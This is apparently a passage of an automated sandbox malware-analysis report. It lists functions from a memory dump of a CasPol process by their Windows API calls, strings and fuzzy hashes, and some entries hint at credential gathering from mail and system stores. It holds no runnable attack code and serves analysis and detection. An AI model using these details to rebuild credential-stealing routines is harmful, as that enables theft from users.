                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1992179935-0
                                                                                                                                                                                    • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                    • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                    • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                    Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                    • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset
                                                                                                                                                                                    • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                    • API String ID: 2221118986-515162456
                                                                                                                                                                                    • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                    • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                    • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                    Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: $, $CREATE TABLE
                                                                                                                                                                                    • API String ID: 3510742995-3459038510
                                                                                                                                                                                    • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                    • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                    • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                    • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                    Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                    • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                      • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                      • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                      • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                    • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3503910906-0
                                                                                                                                                                                    • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                    • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                    • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                    • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                    Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                    • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                    • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                    • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Message$MenuPostSendStringmemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3798638045-0
                                                                                                                                                                                    • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                    • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                                                                                                                                                                                    • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                                                                                                                                                                                    • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                                                                                                                                                                                    Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                                                                                                                                      • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00409ED5
                                                                                                                                                                                    • strlen.MSVCRT ref: 0040B60B
                                                                                                                                                                                    • atoi.MSVCRT(?), ref: 0040B619
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B66C
                                                                                                                                                                                    • _mbsicmp.MSVCRT ref: 0040B67F
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _mbsicmp$??2@??3@atoistrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 4107816708-0
                                                                                                                                                                                    • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                    • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                                                                                                                                                    • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                                                                                                                                                    • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                                                                                                                                                    Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0041140E
                                                                                                                                                                                    • _gmtime64.MSVCRT ref: 00411437
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000024,?,?,000003E8,00000000), ref: 0041144B
                                                                                                                                                                                    • strftime.MSVCRT ref: 00411476
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1886415126-0
                                                                                                                                                                                    • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                    • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                                                                                                                                                    • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                                                                                                                                                    • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                                                                                                                                                    Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: strlen
                                                                                                                                                                                    • String ID: >$>$>
                                                                                                                                                                                    • API String ID: 39653677-3911187716
                                                                                                                                                                                    • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                    • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                                                                                                                                                    • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                                                                                                                                                    • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                                                                                                                                                    Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D248
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000040,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D272
                                                                                                                                                                                    • memcpy.MSVCRT(?,00000000,00000008,00000000,0000041E,00000000,?,00444A02,?,?,?,00000008,?,00000000,00000000), ref: 0040D296
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy
                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                    • API String ID: 3510742995-2766056989
                                                                                                                                                                                    • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                                                                                                                                                    • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                                                                                                                                                    Function 00407FA4 Relevance: 6.1, APIs: 4, Instructions: 63COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00407FD9
                                                                                                                                                                                    • memset.MSVCRT ref: 00407FEA
                                                                                                                                                                                    • memcpy.MSVCRT(0045791C,?,?,00000000,00000000,?,00000000,?,?,0040140F,?,?,?,?,00454020,0000000C), ref: 00407FF6
                                                                                                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00408003
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??2@??3@memcpymemset
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1865533344-0
                                                                                                                                                                                    • Opcode ID: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                    • Instruction ID: b86030d1d6bc714dc1ef3b289d30c8af6c7ebcab3ecced31442563250122d8c5
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3be125bbec447ab7c511ca77c5680941c96119bb7b45ebdfa7cd77d846b95589
                                                                                                                                                                                    • Instruction Fuzzy Hash: 9D116A752046019FE328DF19C881B26F7E5FFD8300B21882EE5DA97385DA35E801CB64
                                                                                                                                                                                    Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: _strcmpi
                                                                                                                                                                                    • String ID: C@$mail.identity
                                                                                                                                                                                    • API String ID: 1439213657-721921413
                                                                                                                                                                                    • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                    • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                                                                                                                                                    • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                                                                                                                                                    • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                                                                                                                                                    Function 00410C68 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • FindResourceA.KERNEL32(?,?,?), ref: 00410C75
                                                                                                                                                                                    • SizeofResource.KERNEL32(?,00000000), ref: 00410C86
                                                                                                                                                                                    • LoadResource.KERNEL32(?,00000000), ref: 00410C96
                                                                                                                                                                                    • LockResource.KERNEL32(00000000), ref: 00410CA1
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Resource$FindLoadLockSizeof
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 3473537107-0
                                                                                                                                                                                    • Opcode ID: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                    • Instruction ID: 06b8370cebe37c7de172ca18b7cbf64f7437cd91f528590ddf6fb1777473d23a
                                                                                                                                                                                    • Opcode Fuzzy Hash: bd954622ed218253ef2d1b1e463bd565b46b01af85fc050a190cf1e92aec0d28
                                                                                                                                                                                    • Instruction Fuzzy Hash: 090196367012166F8B185F69DD9489F7EAEFB853913084136FC05C6361EB71C9818ED8
                                                                                                                                                                                    Function 00410F10 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • SHGetMalloc.SHELL32(?), ref: 00410F20
                                                                                                                                                                                    • SHBrowseForFolder.SHELL32(?), ref: 00410F52
                                                                                                                                                                                    • SHGetPathFromIDList.SHELL32(00000000,?), ref: 00410F66
                                                                                                                                                                                    • _mbscpy.MSVCRT(?,?), ref: 00410F79
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: BrowseFolderFromListMallocPath_mbscpy
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 1479990042-0
                                                                                                                                                                                    • Opcode ID: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                    • Instruction ID: 6920bf835a9bb06566ba915c59caace60c79acb7cf9a25d2f41614c9f7770f55
                                                                                                                                                                                    • Opcode Fuzzy Hash: 3021ac6996c314945b367224c7bd8111e1d6ec744ed02b95fe82b7a37a02f8bd
                                                                                                                                                                                    • Instruction Fuzzy Hash: D411ECB5900208AFDB10DFE5D985AEEB7F8FB49314B10446AE505E7200D7B4DA458B64
                                                                                                                                                                                    Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 00406640
                                                                                                                                                                                      • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,00000000,?), ref: 00406462
                                                                                                                                                                                      • Part of subcall function 004063B2: memcpy.MSVCRT(?,00000060,?,?,?,?,?,00000000,?), ref: 00406475
                                                                                                                                                                                    • memcmp.MSVCRT ref: 00406672
                                                                                                                                                                                    • memcpy.MSVCRT(?,?,00000018,?,00000060,?,?,00000000,00000000), ref: 00406695
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memcpy$memset$memcmp
                                                                                                                                                                                    • String ID: Ul@
                                                                                                                                                                                    • API String ID: 270934217-715280498
                                                                                                                                                                                    • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                                                                                                                                                    • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                                                                                                                                                    • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                                                                                                                                                    Function 0040B903 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 00408DB6: LoadStringA.USER32(00000000,00000006,?,?), ref: 00408E7F
                                                                                                                                                                                      • Part of subcall function 00408DB6: memcpy.MSVCRT(00000000,00000001), ref: 00408EBE
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B929
                                                                                                                                                                                    • SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                                                                                                                                                                                      • Part of subcall function 00408DB6: _mbscpy.MSVCRT(0045A550,strings,?,<html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>,00403F8E,0044C530), ref: 00408E31
                                                                                                                                                                                      • Part of subcall function 00408DB6: strlen.MSVCRT ref: 00408E4F
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040B953
                                                                                                                                                                                    • _mbscat.MSVCRT ref: 0040B966
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: sprintf$LoadMessageSendString_mbscat_mbscpymemcpystrlen
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 203655857-0
                                                                                                                                                                                    • Opcode ID: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                    • Instruction ID: 0d6227c2dffbdb2154d3321facad49e181a647ebd34d8d5e6c5aab0b846496ed
                                                                                                                                                                                    • Opcode Fuzzy Hash: e7a96a4b3b60773b868b861c6ef1878d2d31708076d5e2e16fac633899c29946
                                                                                                                                                                                    • Instruction Fuzzy Hash: EE0117B2500308A6E721EB75DC87FE773ACAB54704F04046AB659B61C3DA78E5444A59
                                                                                                                                                                                    Function 0040ADC5 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ADE8
                                                                                                                                                                                    • memset.MSVCRT ref: 0040ADFE
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _mbscpy.MSVCRT(00000000,?,0040ABD2,?,?,?), ref: 0040A4EB
                                                                                                                                                                                      • Part of subcall function 0040A4E6: _strlwr.MSVCRT ref: 0040A52E
                                                                                                                                                                                    • sprintf.MSVCRT ref: 0040AE28
                                                                                                                                                                                      • Part of subcall function 00406D33: strlen.MSVCRT ref: 00406D40
                                                                                                                                                                                      • Part of subcall function 00406D33: WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 00406D4D
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
                                                                                                                                                                                    • String ID: </%s>
                                                                                                                                                                                    • API String ID: 3699762281-259020660
                                                                                                                                                                                    • Opcode ID: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                    • Instruction ID: ff04cb2e9b10d1c503b051559ee948e99af9d8289afd69eb184e92e88926625d
                                                                                                                                                                                    • Opcode Fuzzy Hash: f78139877eceb876a4a519055c942f2d4715b4df0d29a6dcbc188ebede795ba7
                                                                                                                                                                                    • Instruction Fuzzy Hash: CF01F97290012967E721A619CC46FDEB76C9F54304F0500FAB50DF3142DA74AA448BA5
                                                                                                                                                                                    Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: ??3@
                                                                                                                                                                                    • String ID:
                                                                                                                                                                                    • API String ID: 613200358-0
                                                                                                                                                                                    • Opcode ID: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                                                                                                                                                                                    • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                                                                                                                                                    • Opcode Fuzzy Hash: 5d8d0877f012efe10e0b4b5f1adc401335cc840e4779c4491c3e00c233fdc506
                                                                                                                                                                                    • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                                                                                                                                                    Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                      • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                                                                                                                                                    • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                                                                                                                                                    Strings
                                                                                                                                                                                    • recovered %d pages from %s, xrefs: 004188B4
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
                                                                                                                                                                                    Similarity
                                                                                                                                                                                    • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                                                                                                                                                    • String ID: recovered %d pages from %s
                                                                                                                                                                                    • API String ID: 985450955-1623757624
                                                                                                                                                                                    • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                    • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                                                                                                                                                    • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                                                                                                                                                    • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                                                                                                                                                    Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                    APIs
                                                                                                                                                                                    Strings
                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                    • Source File: 0000001E.00000002.551642428.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                    • Snapshot File: hcaresult_30_2_400000_CasPol.jbxd
